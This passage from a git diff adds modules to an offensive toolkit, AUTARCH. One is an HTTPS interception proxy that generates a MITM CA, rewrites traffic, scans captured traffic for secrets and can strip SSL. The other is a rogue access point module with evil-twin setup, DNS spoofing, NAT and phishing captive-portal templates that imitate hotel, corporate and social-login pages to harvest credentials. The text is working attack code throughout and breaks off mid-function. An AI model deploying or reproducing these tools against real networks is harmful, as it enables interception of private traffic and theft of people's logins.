CA cert. + Returns dict with cert info or error. + """ + try: + from cryptography import x509 + from cryptography.x509.oid import NameOID + from cryptography.hazmat.primitives import hashes, serialization + from cryptography.hazmat.primitives.asymmetric import rsa + from cryptography.hazmat.backends import default_backend + import datetime as dt + + # Generate RSA private key + key = rsa.generate_private_key( + public_exponent=65537, + key_size=2048, + backend=default_backend() + ) + + # Build CA certificate + subject = issuer = x509.Name([ + x509.NameAttribute(NameOID.COUNTRY_NAME, 'US'), + x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, 'Cyberspace'), + x509.NameAttribute(NameOID.ORGANIZATION_NAME, 'AUTARCH MITM CA'), + x509.NameAttribute(NameOID.COMMON_NAME, 'AUTARCH Interception CA'), + ]) + + cert = ( + x509.CertificateBuilder() + .subject_name(subject) + .issuer_name(issuer) + .public_key(key.public_key()) + .serial_number(x509.random_serial_number()) + .not_valid_before(dt.datetime.utcnow()) + .not_valid_after(dt.datetime.utcnow() + dt.timedelta(days=3650)) + .add_extension( + x509.BasicConstraints(ca=True, path_length=0), + critical=True, + ) + .add_extension( + x509.KeyUsage( + digital_signature=True, key_cert_sign=True, + crl_sign=True, key_encipherment=False, + content_commitment=False, data_encipherment=False, + key_agreement=False, encipher_only=False, + decipher_only=False + ), + critical=True, + ) + .sign(key, hashes.SHA256(), default_backend()) + ) + + # Save private key + key_path = self._cert_dir / 'ca-key.pem' + with open(key_path, 'wb') as f: + f.write(key.private_bytes( + encoding=serialization.Encoding.PEM, + format=serialization.PrivateFormat.TraditionalOpenSSL, + encryption_algorithm=serialization.NoEncryption() + )) + + # Save certificate + cert_path = self._cert_dir / 'ca-cert.pem' + with open(cert_path, 'wb') as f: + f.write(cert.public_bytes(serialization.Encoding.PEM)) + + # Save DER format for browser import + der_path = self._cert_dir / 'ca-cert.der' + with open(der_path, 'wb') as f: + f.write(cert.public_bytes(serialization.Encoding.DER)) + + return { + 'success': True, + 'message': 'CA certificate generated', + 'cert_path': str(cert_path), + 'key_path': str(key_path), + 'der_path': str(der_path), + 'subject': 'AUTARCH Interception CA', + 'valid_days': 3650, + } + + except ImportError: + return {'success': False, 'error': 'cryptography library not installed (pip install cryptography)'} + except Exception as e: + return {'success': False, 'error': f'Failed to generate certificate: {str(e)}'} + + def get_ca_cert(self): + """Return CA certificate content for client installation.""" + cert_path = self._cert_dir / 'ca-cert.pem' + der_path = self._cert_dir / 'ca-cert.der' + + if not cert_path.exists(): + return {'success': False, 'error': 'No CA certificate found. Generate one first.'} + + try: + with open(cert_path, 'r') as f: + pem_data = f.read() + + result = { + 'success': True, + 'pem': pem_data, + 'pem_path': str(cert_path), + } + + if der_path.exists(): + import base64 + with open(der_path, 'rb') as f: + result['der_b64'] = base64.b64encode(f.read()).decode('ascii') + result['der_path'] = str(der_path) + + return result + + except Exception as e: + return {'success': False, 'error': f'Failed to read certificate: {str(e)}'} + + def get_certs(self): + """List generated interception certificates.""" + certs = [] + if self._cert_dir.exists(): + for f in sorted(self._cert_dir.iterdir()): + if f.is_file(): + stat = f.stat() + certs.append({ + 'name': f.name, + 'size': stat.st_size, + 'modified': datetime.fromtimestamp(stat.st_mtime).isoformat(), + 'path': str(f), + }) + return certs + + # ── Rules Engine ───────────────────────────────────────────────── + + def add_rule(self, rule): + """Add a modification rule. + + Rule dict keys: + match_url: regex pattern to match URL + match_method: HTTP method or 'ANY' + action: modify_header | modify_body | inject_header | redirect | block + params: dict with action-specific parameters + """ + rule_entry = { + 'id': self._next_rule_id, + 'match_url': rule.get('match_url', '.*'), + 'match_method': rule.get('match_method', 'ANY'), + 'action': rule.get('action', 'block'), + 'params': rule.get('params', {}), + 'enabled': True, + 'created': datetime.now().isoformat(), + } + + # Validate regex + try: + re.compile(rule_entry['match_url']) + except re.error as e: + return {'success': False, 'error': f'Invalid URL pattern: {str(e)}'} + + # Validate action + valid_actions = ('modify_header', 'modify_body', 'inject_header', 'redirect', 'block') + if rule_entry['action'] not in valid_actions: + return {'success': False, 'error': f'Invalid action. Must be one of: {", ".join(valid_actions)}'} + + self._rules.append(rule_entry) + self._next_rule_id += 1 + self._save_rules() + + return {'success': True, 'rule': rule_entry} + + def remove_rule(self, rule_id): + """Remove a rule by ID.""" + rule_id = int(rule_id) + for i, rule in enumerate(self._rules): + if rule['id'] == rule_id: + removed = self._rules.pop(i) + self._save_rules() + return {'success': True, 'removed': removed} + return {'success': False, 'error': f'Rule {rule_id} not found'} + + def list_rules(self): + """List all active rules.""" + return self._rules + + def enable_rule(self, rule_id): + """Enable a rule.""" + rule_id = int(rule_id) + for rule in self._rules: + if rule['id'] == rule_id: + rule['enabled'] = True + self._save_rules() + return {'success': True, 'rule': rule} + return {'success': False, 'error': f'Rule {rule_id} not found'} + + def disable_rule(self, rule_id): + """Disable a rule.""" + rule_id = int(rule_id) + for rule in self._rules: + if rule['id'] == rule_id: + rule['enabled'] = False + self._save_rules() + return {'success': True, 'rule': rule} + return {'success': False, 'error': f'Rule {rule_id} not found'} + + def _save_rules(self): + """Persist rules to disk.""" + try: + with open(self._rules_path, 'w') as f: + json.dump(self._rules, f, indent=2) + except Exception: + pass + + def _load_rules(self): + """Load rules from disk.""" + if self._rules_path.exists(): + try: + with open(self._rules_path, 'r') as f: + self._rules = json.load(f) + if self._rules: + self._next_rule_id = max(r.get('id', 0) for r in self._rules) + 1 + except Exception: + self._rules = [] + + # ── Traffic Logging ────────────────────────────────────────────── + + def _log_traffic(self, method, url, status, req_headers, req_body, + resp_headers, resp_body, size, start_time): + """Log a traffic entry.""" + duration = round((time.time() - start_time) * 1000, 1) + + # Safely encode body content for JSON storage + def safe_body(body): + if body is None: + return '' + if isinstance(body, bytes): + try: + return body.decode('utf-8', errors='replace')[:10000] + except Exception: + return f'' + return str(body)[:10000] + + # Detect secrets + secrets = self._scan_for_secrets(req_headers, req_body, resp_headers, resp_body) + + entry = { + 'id': self._next_traffic_id, + 'timestamp': datetime.now().isoformat(), + 'method': method, + 'url': url, + 'status': status, + 'request_headers': dict(req_headers) if isinstance(req_headers, dict) else {}, + 'request_body': safe_body(req_body), + 'response_headers': dict(resp_headers) if isinstance(resp_headers, dict) else {}, + 'response_body': safe_body(resp_body), + 'size': size, + 'duration': duration, + 'secrets_found': secrets, + } + + with self._traffic_lock: + self._traffic.append(entry) + self._next_traffic_id += 1 + self._request_count += 1 + + # Keep max 10000 entries in memory + if len(self._traffic) > 10000: + self._traffic = self._traffic[-5000:] + + def get_traffic(self, limit=100, offset=0, filter_url=None, filter_method=None, + filter_status=None): + """Return captured traffic entries with optional filtering.""" + with self._traffic_lock: + entries = list(self._traffic) + + # Apply filters + if filter_url: + try: + pattern = re.compile(filter_url, re.IGNORECASE) + entries = [e for e in entries if pattern.search(e.get('url', ''))] + except re.error: + entries = [e for e in entries if filter_url.lower() in e.get('url', '').lower()] + + if filter_method: + entries = [e for e in entries if e.get('method', '').upper() == filter_method.upper()] + + if filter_status: + try: + status_code = int(filter_status) + entries = [e for e in entries if e.get('status') == status_code] + except (ValueError, TypeError): + pass + + # Sort by most recent first + entries = list(reversed(entries)) + + total = len(entries) + entries = entries[offset:offset + limit] + + # Strip bodies from list view for performance + summary = [] + for e in entries: + summary.append({ + 'id': e['id'], + 'timestamp': e['timestamp'], + 'method': e['method'], + 'url': e['url'][:200], + 'status': e['status'], + 'size': e['size'], + 'duration': e['duration'], + 'secrets_found': len(e.get('secrets_found', [])) > 0, + }) + + return {'entries': summary, 'total': total, 'limit': limit, 'offset': offset} + + def get_request(self, request_id): + """Get full request/response details for a traffic entry.""" + request_id = int(request_id) + with self._traffic_lock: + for entry in self._traffic: + if entry['id'] == request_id: + return {'success': True, 'entry': entry} + return {'success': False, 'error': f'Request {request_id} not found'} + + def clear_traffic(self): + """Clear traffic log.""" + with self._traffic_lock: + self._traffic.clear() + self._request_count = 0 + return {'success': True, 'message': 'Traffic log cleared'} + + def export_traffic(self, fmt='json'): + """Export traffic log.""" + with self._traffic_lock: + entries = list(self._traffic) + + if fmt == 'json': + return { + 'success': True, + 'format': 'json', + 'data': json.dumps(entries, indent=2), + 'count': len(entries), + } + elif fmt == 'csv': + import io + import csv + output = io.StringIO() + writer = csv.writer(output) + writer.writerow(['id', 'timestamp', 'method', 'url', 'status', + 'size', 'duration', 'secrets']) + for e in entries: + writer.writerow([ + e['id'], e['timestamp'], e['method'], e['url'], + e['status'], e['size'], e['duration'], + len(e.get('secrets_found', [])) + ]) + return { + 'success': True, + 'format': 'csv', + 'data': output.getvalue(), + 'count': len(entries), + } + else: + return {'success': False, 'error': f'Unsupported format: {fmt}'} + + # ── Secret Detection ───────────────────────────────────────────── + + def _scan_for_secrets(self, req_headers, req_body, resp_headers, resp_body): + """Scan request/response for secrets and sensitive data.""" + secrets = [] + search_texts = [] + + # Collect all text to scan + if isinstance(req_headers, dict): + for k, v in req_headers.items(): + search_texts.append(f'{k}: {v}') + if req_body: + if isinstance(req_body, bytes): + try: + search_texts.append(req_body.decode('utf-8', errors='replace')) + except Exception: + pass + else: + search_texts.append(str(req_body)) + + if isinstance(resp_headers, dict): + for k, v in resp_headers.items(): + search_texts.append(f'{k}: {v}') + if resp_body: + if isinstance(resp_body, bytes): + try: + search_texts.append(resp_body.decode('utf-8', errors='replace')) + except Exception: + pass + else: + search_texts.append(str(resp_body)) + + combined = '\n'.join(search_texts) + + for pattern, label in _COMPILED_SECRETS: + matches = pattern.findall(combined) + for match in matches: + value = match if isinstance(match, str) else match[0] + # Mask the secret value for display + if len(value) > 8: + masked = value[:4] + '*' * (len(value) - 8) + value[-4:] + else: + masked = value[:2] + '*' * (len(value) - 2) + secrets.append({ + 'type': label, + 'value_masked': masked, + 'location': 'request/response', + }) + + return secrets + + def find_secrets(self, traffic_entry): + """Scan a specific traffic entry for secrets. Returns list of findings.""" + if isinstance(traffic_entry, (int, str)): + result = self.get_request(traffic_entry) + if not result.get('success'): + return [] + traffic_entry = result['entry'] + + return self._scan_for_secrets( + traffic_entry.get('request_headers', {}), + traffic_entry.get('request_body', ''), + traffic_entry.get('response_headers', {}), + traffic_entry.get('response_body', ''), + ) + + # ── SSL Strip ──────────────────────────────────────────────────── + + def ssl_strip_mode(self, enabled=True): + """Toggle SSL stripping (rewrite HTTPS links to HTTP).""" + self._ssl_strip = bool(enabled) + return { + 'success': True, + 'ssl_strip': self._ssl_strip, + 'message': f'SSL stripping {"enabled" if self._ssl_strip else "disabled"}', + } + + # ── CLI Interface ──────────────────────────────────────────────── + + def run(self): + """Interactive CLI for the MITM Proxy module.""" + while True: + clear_screen() + display_banner() + print(f"\n{Colors.BOLD}{Colors.RED}MITM Proxy{Colors.RESET}") + print(f"{Colors.DIM}HTTP(S) interception proxy & traffic analysis{Colors.RESET}\n") + + status = self.get_status() + if status['running']: + print(f"{Colors.GREEN}[+] Proxy RUNNING on {status['host']}:{status['port']}" + f" ({status['engine']}){Colors.RESET}") + print(f" Requests: {status['request_count']} | " + f"Rules: {status['rules_count']} | " + f"SSL Strip: {'ON' if status['ssl_strip'] else 'OFF'}") + if status['upstream_proxy']: + print(f" Upstream: {status['upstream_proxy']}") + else: + print(f"{Colors.YELLOW}[-] Proxy STOPPED{Colors.RESET}") + + print(f"\n{Colors.CYAN}1{Colors.RESET} Start Proxy") + print(f"{Colors.CYAN}2{Colors.RESET} Stop Proxy") + print(f"{Colors.CYAN}3{Colors.RESET} Add Rule") + print(f"{Colors.CYAN}4{Colors.RESET} View Traffic") + print(f"{Colors.CYAN}5{Colors.RESET} Find Secrets") + print(f"{Colors.CYAN}6{Colors.RESET} Generate CA Certificate") + print(f"{Colors.CYAN}7{Colors.RESET} Toggle SSL Strip") + print(f"{Colors.CYAN}8{Colors.RESET} List Rules") + print(f"{Colors.CYAN}0{Colors.RESET} Back\n") + + try: + choice = input(f"{Colors.WHITE}Choice: {Colors.RESET}").strip() + except (EOFError, KeyboardInterrupt): + break + + if choice == '0': + break + + elif choice == '1': + if status['running']: + print(f"\n{Colors.YELLOW}Proxy is already running.{Colors.RESET}") + else: + host = input(f"Listen host [{self._listen_host}]: ").strip() or self._listen_host + port = input(f"Listen port [{self._listen_port}]: ").strip() or str(self._listen_port) + upstream = input("Upstream proxy (host:port, blank for none): ").strip() or None + result = self.start(host, int(port), upstream) + if result['success']: + print(f"\n{Colors.GREEN}[+] {result['message']}{Colors.RESET}") + else: + print(f"\n{Colors.RED}[-] {result['error']}{Colors.RESET}") + + elif choice == '2': + result = self.stop() + if result['success']: + print(f"\n{Colors.GREEN}[+] {result['message']}{Colors.RESET}") + else: + print(f"\n{Colors.YELLOW}[-] {result['error']}{Colors.RESET}") + + elif choice == '3': + print(f"\n{Colors.BOLD}Add Modification Rule{Colors.RESET}") + url_pattern = input("URL pattern (regex): ").strip() or '.*' + method = input("Method filter (GET/POST/ANY): ").strip().upper() or 'ANY' + print("Actions: block, redirect, modify_header, inject_header, modify_body") + action = input("Action: ").strip().lower() + params = {} + if action == 'redirect': + params['target_url'] = input("Redirect URL: ").strip() + elif action in ('modify_header', 'inject_header'): + params['header_name'] = input("Header name: ").strip() + params['header_value'] = input("Header value: ").strip() + elif action == 'modify_body': + params['search'] = input("Search string: ").strip() + params['replace'] = input("Replace with: ").strip() + + result = self.add_rule({ + 'match_url': url_pattern, + 'match_method': method, + 'action': action, + 'params': params, + }) + if result['success']: + print(f"\n{Colors.GREEN}[+] Rule added (ID: {result['rule']['id']}){Colors.RESET}") + else: + print(f"\n{Colors.RED}[-] {result['error']}{Colors.RESET}") + + elif choice == '4': + traffic = self.get_traffic(limit=20) + entries = traffic.get('entries', []) + if not entries: + print(f"\n{Colors.YELLOW}No traffic captured yet.{Colors.RESET}") + else: + print(f"\n{Colors.BOLD}Recent Traffic ({traffic['total']} total){Colors.RESET}\n") + print(f"{'ID':>5} {'Method':<8} {'Status':<7} {'Size':>8} {'URL'}") + print("-" * 80) + for e in entries: + secrets_flag = ' *' if e.get('secrets_found') else '' + print(f"{e['id']:>5} {e['method']:<8} {e['status']:<7} " + f"{e['size']:>8} {e['url'][:50]}{secrets_flag}") + + elif choice == '5': + traffic = self.get_traffic(limit=1000) + entries = traffic.get('entries', []) + found = [e for e in entries if e.get('secrets_found')] + if not found: + print(f"\n{Colors.YELLOW}No secrets found in captured traffic.{Colors.RESET}") + else: + print(f"\n{Colors.RED}[!] Secrets found in {len(found)} requests:{Colors.RESET}\n") + for e in found: + req = self.get_request(e['id']) + if req.get('success'): + full = req['entry'] + for s in full.get('secrets_found', []): + print(f" {Colors.YELLOW}{s['type']}{Colors.RESET}: " + f"{s['value_masked']} ({full['method']} {full['url'][:60]})") + + elif choice == '6': + result = self.generate_ca_cert() + if result['success']: + print(f"\n{Colors.GREEN}[+] {result['message']}{Colors.RESET}") + print(f" Cert: {result['cert_path']}") + print(f" Key: {result['key_path']}") + else: + print(f"\n{Colors.RED}[-] {result['error']}{Colors.RESET}") + + elif choice == '7': + self._ssl_strip = not self._ssl_strip + state = 'ENABLED' if self._ssl_strip else 'DISABLED' + color = Colors.GREEN if self._ssl_strip else Colors.YELLOW + print(f"\n{color}[*] SSL Strip mode {state}{Colors.RESET}") + + elif choice == '8': + rules = self.list_rules() + if not rules: + print(f"\n{Colors.YELLOW}No rules configured.{Colors.RESET}") + else: + print(f"\n{Colors.BOLD}Active Rules{Colors.RESET}\n") + for r in rules: + state = f"{Colors.GREEN}ON{Colors.RESET}" if r['enabled'] else f"{Colors.RED}OFF{Colors.RESET}" + print(f" [{r['id']}] {state} {r['action']:<15} " + f"{r['match_method']:<6} {r['match_url']}") + + if choice in ('1', '2', '3', '4', '5', '6', '7', '8'): + try: + input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}") + except (EOFError, KeyboardInterrupt): + break + + +# ==================== SINGLETON ==================== + +_mitm_proxy_instance = None + + +def get_mitm_proxy(): + """Get or create singleton MITMProxy instance.""" + global _mitm_proxy_instance + if _mitm_proxy_instance is None: + _mitm_proxy_instance = MITMProxy() + return _mitm_proxy_instance + + +def run(): + get_mitm_proxy().run() + + +if __name__ == "__main__": + run() diff --git a/modules/pineapple.py b/modules/pineapple.py new file mode 100644 index 0000000..c0ad1cb --- /dev/null +++ b/modules/pineapple.py @@ -0,0 +1,1669 @@ +"""AUTARCH WiFi Pineapple / Rogue AP + +Evil twin AP, captive portal, karma attack, client MITM, +DNS spoofing, and credential capture for wireless assessments. +Designed for Raspberry Pi and SBCs with dual WiFi or WiFi + Ethernet. +""" + +DESCRIPTION = "Rogue AP — evil twin, captive portal, karma attacks" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import re +import json +import time +import shutil +import signal +import threading +import subprocess +from pathlib import Path +from datetime import datetime +from typing import Dict, List, Optional, Any + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + def find_tool(name): + return shutil.which(name) + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + +# ── Captive Portal HTML Templates ──────────────────────────────────────────── + +CAPTIVE_PORTAL_TEMPLATES = { + 'hotel_wifi': ''' + + + + +Hotel WiFi — Guest Portal + + + +
+

Welcome to Our Hotel

+Enter your room details to connect to the internet. +
+ + + + + + + +
+ +
+ +''', + + 'corporate': ''' + + + + +Corporate Network — Authentication + + + +
+ +

Network Authentication

+Sign in with your corporate credentials to access the network. +
+ + + + + + + +
+
This is a monitored network. Unauthorized access is prohibited.
+ +
+ +''', + + 'social_login': ''' + + + + +Free WiFi — Connect + + + +
+

Free WiFi Hotspot

+Sign in to get connected. +
+ + +
or sign in with email
+ + + + + +
+ +
+ +''', + + 'terms_accept': ''' + + + + +WiFi — Accept Terms + + + +
+

WiFi Access

+Please accept the terms of service to connect. +
+

Terms of Service

+

1. This wireless network is provided for authorized use only. By accessing this network, you agree to be bound by these terms.

+

2. You agree not to engage in any illegal or unauthorized activity while using this network. All network traffic may be monitored and logged.

+

3. The network provider is not responsible for any data loss, security breaches, or damages resulting from use of this network.

+

4. You acknowledge that this is a shared network and that data transmitted may be visible to other users. Use of VPN is recommended for sensitive communications.

+

5. The provider reserves the right to terminate access at any time without notice for any violation of these terms.

+

6. Maximum bandwidth allocation applies. Streaming and large downloads may be throttled during peak hours.

+

7. You agree to provide accurate registration information.

+
+
+ +
+ + +
+
+ + +
+ + +
+ +
+ +''', +} + +PORTAL_SUCCESS_PAGE = ''' + + + + +Connected + + + +
+
+

Connected Successfully

+

You are now connected to the internet. You may close this page and begin browsing.

+
+ +''' + + +# ── Pineapple AP Class ─────────────────────────────────────────────────────── + +class PineappleAP: + """WiFi Pineapple / Rogue AP controller.""" + + _instance = None + + def __init__(self): + data_dir = get_data_dir() + if isinstance(data_dir, Path): + data_dir = str(data_dir) + self.data_dir = os.path.join(data_dir, 'pineapple') + os.makedirs(self.data_dir, exist_ok=True) + + self.configs_dir = os.path.join(self.data_dir, 'configs') + os.makedirs(self.configs_dir, exist_ok=True) + self.captures_dir = os.path.join(self.data_dir, 'captures') + os.makedirs(self.captures_dir, exist_ok=True) + self.traffic_dir = os.path.join(self.data_dir, 'traffic') + os.makedirs(self.traffic_dir, exist_ok=True) + + # Tool paths + self.hostapd = find_tool('hostapd') or shutil.which('hostapd') + self.dnsmasq = find_tool('dnsmasq') or shutil.which('dnsmasq') + self.iptables = find_tool('iptables') or shutil.which('iptables') + self.nftables = find_tool('nft') or shutil.which('nft') + self.airbase = find_tool('airbase-ng') or shutil.which('airbase-ng') + self.aireplay = find_tool('aireplay-ng') or shutil.which('aireplay-ng') + self.sslstrip_bin = find_tool('sslstrip') or shutil.which('sslstrip') + self.tcpdump = find_tool('tcpdump') or shutil.which('tcpdump') + self.iwconfig_bin = shutil.which('iwconfig') + self.iw_bin = shutil.which('iw') + self.ip_bin = shutil.which('ip') + + # State + self._ap_running = False + self._ap_ssid = '' + self._ap_channel = 6 + self._ap_interface = '' + self._internet_interface = '' + self._hostapd_proc: Optional[subprocess.Popen] = None + self._dnsmasq_proc: Optional[subprocess.Popen] = None + self._portal_active = False + self._portal_type = '' + self._karma_active = False + self._karma_proc: Optional[subprocess.Popen] = None + self._sslstrip_proc: Optional[subprocess.Popen] = None + self._sslstrip_active = False + self._sniff_proc: Optional[subprocess.Popen] = None + self._dns_spoofs: Dict[str, str] = {} + self._dns_spoof_active = False + self._clients: Dict[str, Dict] = {} + self._portal_captures: List[Dict] = [] + self._traffic_stats: Dict[str, Any] = { + 'total_bytes': 0, 'top_domains': {}, 'top_clients': {} + } + self._lock = threading.Lock() + + # Load persisted captures + self._load_captures() + + # ── Interface Management ───────────────────────────────────────────── + + def get_interfaces(self) -> List[Dict]: + """List wireless interfaces with driver info, mode, channel.""" + interfaces = [] + + # Try iw first + if self.iw_bin: + try: + out = subprocess.check_output( + [self.iw_bin, 'dev'], text=True, timeout=5, + stderr=subprocess.DEVNULL + ) + current_phy = '' + iface = None + for line in out.splitlines(): + stripped = line.strip() + if stripped.startswith('phy#'): + current_phy = stripped + elif stripped.startswith('Interface'): + if iface: + interfaces.append(iface) + iface = { + 'name': stripped.split()[-1], + 'mode': 'managed', + 'channel': 0, + 'mac': '', + 'phy': current_phy, + 'driver': '' + } + elif iface: + if stripped.startswith('type'): + iface['mode'] = stripped.split()[-1] + elif stripped.startswith('channel'): + try: + iface['channel'] = int(stripped.split()[1]) + except (ValueError, IndexError): + pass + elif stripped.startswith('addr'): + iface['mac'] = stripped.split()[-1] + if iface: + interfaces.append(iface) + except Exception: + pass + + # Get driver info from /sys + for iface in interfaces: + try: + driver_link = Path(f'/sys/class/net/{iface["name"]}/device/driver') + if driver_link.exists(): + iface['driver'] = os.path.basename(os.readlink(str(driver_link))) + except Exception: + pass + + # Fallback to iwconfig + if not interfaces and self.iwconfig_bin: + try: + out = subprocess.check_output( + [self.iwconfig_bin], text=True, + stderr=subprocess.DEVNULL, timeout=5 + ) + for block in out.split('\n\n'): + if 'IEEE 802.11' in block or 'ESSID' in block: + name = block.split()[0] + mode = 'managed' + if 'Mode:Monitor' in block: + mode = 'monitor' + elif 'Mode:Master' in block: + mode = 'master' + ch_m = re.search(r'Channel[:\s]*(\d+)', block) + ch = int(ch_m.group(1)) if ch_m else 0 + interfaces.append({ + 'name': name, 'mode': mode, 'channel': ch, + 'mac': '', 'phy': '', 'driver': '' + }) + except Exception: + pass + + # Fallback: /sys/class/net + if not interfaces: + try: + wireless_dir = Path('/sys/class/net') + if wireless_dir.exists(): + for d in wireless_dir.iterdir(): + if (d / 'wireless').exists() or (d / 'phy80211').exists(): + driver = '' + try: + dl = d / 'device' / 'driver' + if dl.exists(): + driver = os.path.basename(os.readlink(str(dl))) + except Exception: + pass + interfaces.append({ + 'name': d.name, 'mode': 'unknown', 'channel': 0, + 'mac': '', 'phy': '', 'driver': driver + }) + except Exception: + pass + + # Also list non-wireless interfaces (for internet_interface) + # Tag each with 'wireless': True/False + wireless_names = {i['name'] for i in interfaces} + for iface in interfaces: + iface['wireless'] = True + + try: + net_dir = Path('/sys/class/net') + if net_dir.exists(): + for d in net_dir.iterdir(): + if d.name not in wireless_names and d.name != 'lo': + # Check if it's up and has carrier + try: + operstate = (d / 'operstate').read_text().strip() + except Exception: + operstate = 'unknown' + interfaces.append({ + 'name': d.name, 'mode': operstate, + 'channel': 0, 'mac': '', 'phy': '', + 'driver': '', 'wireless': False + }) + except Exception: + pass + + return interfaces + + def get_tools_status(self) -> Dict[str, bool]: + """Check availability of all required tools.""" + return { + 'hostapd': self.hostapd is not None, + 'dnsmasq': self.dnsmasq is not None, + 'iptables': self.iptables is not None, + 'nft': self.nftables is not None, + 'airbase-ng': self.airbase is not None, + 'aireplay-ng': self.aireplay is not None, + 'sslstrip': self.sslstrip_bin is not None, + 'tcpdump': self.tcpdump is not None, + 'iw': self.iw_bin is not None, + 'ip': self.ip_bin is not None, + } + + # ── Rogue AP ───────────────────────────────────────────────────────── + + def start_rogue_ap(self, ssid: str, interface: str, channel: int = 6, + encryption: str = 'open', password: str = None, + internet_interface: str = None) -> Dict: + """Configure and start hostapd-based rogue access point.""" + if self._ap_running: + return {'ok': False, 'error': 'AP is already running. Stop it first.'} + if not self.hostapd: + return {'ok': False, 'error': 'hostapd not found. Install with: apt install hostapd'} + if not self.dnsmasq: + return {'ok': False, 'error': 'dnsmasq not found. Install with: apt install dnsmasq'} + if not ssid or not interface: + return {'ok': False, 'error': 'SSID and interface are required'} + + try: + # Build hostapd configuration + hostapd_conf = os.path.join(self.configs_dir, 'hostapd.conf') + conf_lines = [ + f'interface={interface}', + f'ssid={ssid}', + f'channel={channel}', + 'driver=nl80211', + 'hw_mode=g', + 'wmm_enabled=0', + 'macaddr_acl=0', + 'auth_algs=1', + 'ignore_broadcast_ssid=0', + ] + + if encryption == 'wpa2' and password: + conf_lines.extend([ + 'wpa=2', + 'wpa_key_mgmt=WPA-PSK', + f'wpa_passphrase={password}', + 'rsn_pairwise=CCMP', + ]) + elif encryption == 'wpa' and password: + conf_lines.extend([ + 'wpa=1', + 'wpa_key_mgmt=WPA-PSK', + f'wpa_passphrase={password}', + 'wpa_pairwise=TKIP', + ]) + + with open(hostapd_conf, 'w') as f: + f.write('\n'.join(conf_lines) + '\n') + + # Configure interface IP + ap_ip = '10.0.0.1' + ap_subnet = '10.0.0.0/24' + if self.ip_bin: + subprocess.run( + [self.ip_bin, 'addr', 'flush', 'dev', interface], + capture_output=True, timeout=5 + ) + subprocess.run( + [self.ip_bin, 'addr', 'add', f'{ap_ip}/24', 'dev', interface], + capture_output=True, timeout=5 + ) + subprocess.run( + [self.ip_bin, 'link', 'set', interface, 'up'], + capture_output=True, timeout=5 + ) + + # Build dnsmasq configuration + dnsmasq_conf = os.path.join(self.configs_dir, 'dnsmasq.conf') + dns_lines = [ + f'interface={interface}', + 'bind-interfaces', + f'dhcp-range=10.0.0.10,10.0.0.250,255.255.255.0,12h', + f'dhcp-option=3,{ap_ip}', + f'dhcp-option=6,{ap_ip}', + f'server=8.8.8.8', + f'server=8.8.4.4', + 'log-queries', + f'log-facility={os.path.join(self.data_dir, "dnsmasq.log")}', + f'dhcp-leasefile={os.path.join(self.data_dir, "dnsmasq.leases")}', + ] + + # Add DNS spoofs if active + if self._dns_spoof_active and self._dns_spoofs: + for domain, ip in self._dns_spoofs.items(): + dns_lines.append(f'address=/{domain}/{ip}') + + with open(dnsmasq_conf, 'w') as f: + f.write('\n'.join(dns_lines) + '\n') + + # Set up NAT/forwarding if internet interface provided + if internet_interface: + self._setup_nat(interface, internet_interface, ap_subnet) + self._internet_interface = internet_interface + + # Start hostapd + self._hostapd_proc = subprocess.Popen( + [self.hostapd, hostapd_conf], + stdout=subprocess.PIPE, stderr=subprocess.PIPE + ) + time.sleep(1) + + # Check if hostapd started OK + if self._hostapd_proc.poll() is not None: + stderr = self._hostapd_proc.stderr.read().decode(errors='replace') + return {'ok': False, 'error': f'hostapd failed to start: {stderr[:300]}'} + + # Start dnsmasq + self._dnsmasq_proc = subprocess.Popen( + [self.dnsmasq, '-C', dnsmasq_conf, '-d'], + stdout=subprocess.PIPE, stderr=subprocess.PIPE + ) + time.sleep(0.5) + + if self._dnsmasq_proc.poll() is not None: + stderr = self._dnsmasq_proc.stderr.read().decode(errors='replace') + self._hostapd_proc.terminate() + return {'ok': False, 'error': f'dnsmasq failed to start: {stderr[:300]}'} + + self._ap_running = True + self._ap_ssid = ssid + self._ap_channel = channel + self._ap_interface = interface + + return { + 'ok': True, + 'message': f'Rogue AP "{ssid}" started on {interface} (ch {channel})', + 'ssid': ssid, + 'channel': channel, + 'interface': interface, + 'ip': ap_ip, + 'encryption': encryption, + 'nat': internet_interface is not None + } + + except Exception as e: + self.stop_rogue_ap() + return {'ok': False, 'error': str(e)} + + def stop_rogue_ap(self) -> Dict: + """Stop rogue AP, kill hostapd/dnsmasq, cleanup.""" + errors = [] + + # Kill hostapd + if self._hostapd_proc: + try: + self._hostapd_proc.terminate() + self._hostapd_proc.wait(timeout=5) + except Exception: + try: + self._hostapd_proc.kill() + except Exception: + pass + self._hostapd_proc = None + + # Kill dnsmasq + if self._dnsmasq_proc: + try: + self._dnsmasq_proc.terminate() + self._dnsmasq_proc.wait(timeout=5) + except Exception: + try: + self._dnsmasq_proc.kill() + except Exception: + pass + self._dnsmasq_proc = None + + # Remove NAT rules + if self._internet_interface and self._ap_interface: + self._teardown_nat(self._ap_interface, self._internet_interface) + + # Stop captive portal if running + if self._portal_active: + self.stop_captive_portal() + + # Stop karma if running + if self._karma_active: + self.disable_karma() + + # Stop SSL strip if running + if self._sslstrip_active: + self.disable_ssl_strip() + + # Flush interface IP + if self.ip_bin and self._ap_interface: + try: + subprocess.run( + [self.ip_bin, 'addr', 'flush', 'dev', self._ap_interface], + capture_output=True, timeout=5 + ) + except Exception: + pass + + self._ap_running = False + self._ap_ssid = '' + self._ap_channel = 6 + self._ap_interface = '' + self._internet_interface = '' + self._clients.clear() + + return {'ok': True, 'message': 'Rogue AP stopped and cleaned up'} + + def is_running(self) -> bool: + """Check if AP is active.""" + if self._ap_running and self._hostapd_proc: + if self._hostapd_proc.poll() is not None: + self._ap_running = False + return self._ap_running + + def get_status(self) -> Dict: + """Get AP status details.""" + running = self.is_running() + return { + 'running': running, + 'ssid': self._ap_ssid if running else '', + 'channel': self._ap_channel if running else 0, + 'interface': self._ap_interface if running else '', + 'internet_interface': self._internet_interface if running else '', + 'client_count': len(self._clients) if running else 0, + 'portal_active': self._portal_active, + 'portal_type': self._portal_type, + 'karma_active': self._karma_active, + 'sslstrip_active': self._sslstrip_active, + 'dns_spoof_active': self._dns_spoof_active, + 'dns_spoofs': self._dns_spoofs if self._dns_spoof_active else {}, + 'capture_count': len(self._portal_captures), + 'tools': self.get_tools_status() + } + + # ── Evil Twin ──────────────────────────────────────────────────────── + + def evil_twin(self, 